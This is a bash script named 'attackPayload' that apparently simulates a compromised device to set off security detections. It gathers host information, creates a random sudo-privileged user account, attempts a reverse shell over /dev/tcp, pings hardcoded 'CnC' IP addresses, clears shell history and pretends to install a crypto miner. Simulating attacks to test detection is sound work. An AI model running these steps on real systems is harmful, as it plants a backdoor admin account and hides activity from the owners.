
attackPayload

  1. #!/bin/bash
  2. # Running from within the attacked device
  3.  
  4. # arguments
  5. INTERACTIVE=true
  6.  
  7. function interactiveCheckpoint {
  8.     if [ "$INTERACTIVE" = true ]
  9.     then
  10.         echo "Press [Enter] to continue attack"
  11.         read continue
  12.     fi
  13. }
  14.  
  15.  
  16. function attack {
  17.     # Local host reconnaissance detected
  18.     echo "###################################################################"
  19.     echo "           Getting device information                              "
  20.     echo "###################################################################"
  21.         echo $(date -u) " Conducting analysis of host data..."
  22.         uname -a -v -n
  23.         echo $(date -u) " Got host data"
  24.  
  25.     # Detected suspicious use of the useradd command
  26.     echo "###################################################################"
  27.     echo "           Create User and Escalate Privilege                           "
  28.     echo "###################################################################"
  29.  
  30.         USER="privilegeduser"${RANDOM}""
  31.  
  32.         echo $(date -u) " Adding user named ${USER} with privilege root to the system..."
  33.         useradd $USER
  34.         sudo usermod -aG sudo $USER
  35.         echo $(date -u) " Successfully added user named "${USER}" with privilege root to the system"
  36.  
  37.     echo -e "\e[01;32m$(toilet -f pagga "3 C&C Connected")\e[00m"
  38.     interactiveCheckpoint
  39.  
  40.     # Reverse shells, Suspicious IP address communication
  41.     echo "###################################################################"
  42.     echo "           Communicating with CnC for getting attack commands           "
  43.     echo "###################################################################"
  44.  
  45.         echo $(date -u) " Opening reverse shell..."
  46.         bash /dev/tcp/ 2> /dev/null
  47.         echo $(date -u) " Reverse shell established"
  48.  
  49.         echo $(date -u) " Communicating with CnC server..."
  50.         ping -c1 209.17.96.18 > pingtoCnC.txt
  51.         ping -c1 209.17.96.106 > pingtoCnC.txt
  52.         ping -c1 209.17.96.234 > pingtoCnC.txt
  53.         ping -c1 106.51.80.198 > pingtoCnC.txt
  54.  
  55.         echo $(date -u) " Listening to CnC for future attack commands..."
  56.  
  57.     # Removal of system logs files detected
  58.     echo "###################################################################"
  59.     echo "           Covering Tracks - Deleting Logs and Executables         "
  60.     echo "###################################################################"
  61.  
  62.         echo $(date -u) " Deleting history files..."
  63.         history -c
  64.         echo $(date -u) " Deleted history files"
  65.  
  66.     # Crypto Coin Miner
  67.     echo "###################################################################"
  68.     echo "           Installing (Fake) Crypto Currency miner                 "
  69.     echo "###################################################################"
  70.  
  71.         echo $(date -u) " Setting up crypto miner..."
  72.         echo $(date -u) " Cloning into 'cpuminer'..."
  73.         git clone https://github.com/cpuminer 2> /dev/null
  74.         echo $(date -u) " Mining crypto with device resources"
  75. }
  76.  
  77.  
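# Positional (non-flag) arguments collected by parse_args and restored below.
POSITIONAL=()

#######################################
# Print the command-line synopsis.
# Referenced by -h/--help; the original paste called it without defining it,
# so -h printed "command not found" before exiting 0.
# Outputs:   one usage line on stderr
#######################################
usage() {
  printf 'Usage: %s [-ni|--non-interactive] [-h|--help]\n' "${0##*/}" >&2
}

#######################################
# Parse the command-line flags.
# Globals:   INTERACTIVE (written: false on -ni), POSITIONAL (appended)
# Arguments: the script's "$@"
# Outputs:   usage text on -h (then exits 0)
# Returns:   0
#######################################
parse_args() {
  while (( $# > 0 )); do
    case "$1" in
      -ni|--non-interactive)
        INTERACTIVE=false
        # The flag takes no value, so a single shift; the original shifted
        # twice and silently swallowed whatever argument followed -ni.
        shift
        ;;
      -h|--help)
        usage
        exit 0
        ;;
      *)
        # unknown option: keep it so it can be restored as a positional parameter
        POSITIONAL+=("$1")
        shift
        ;;
    esac
  done
}

parse_args "$@"
set -- "${POSITIONAL[@]}" # restore positional parameters

attack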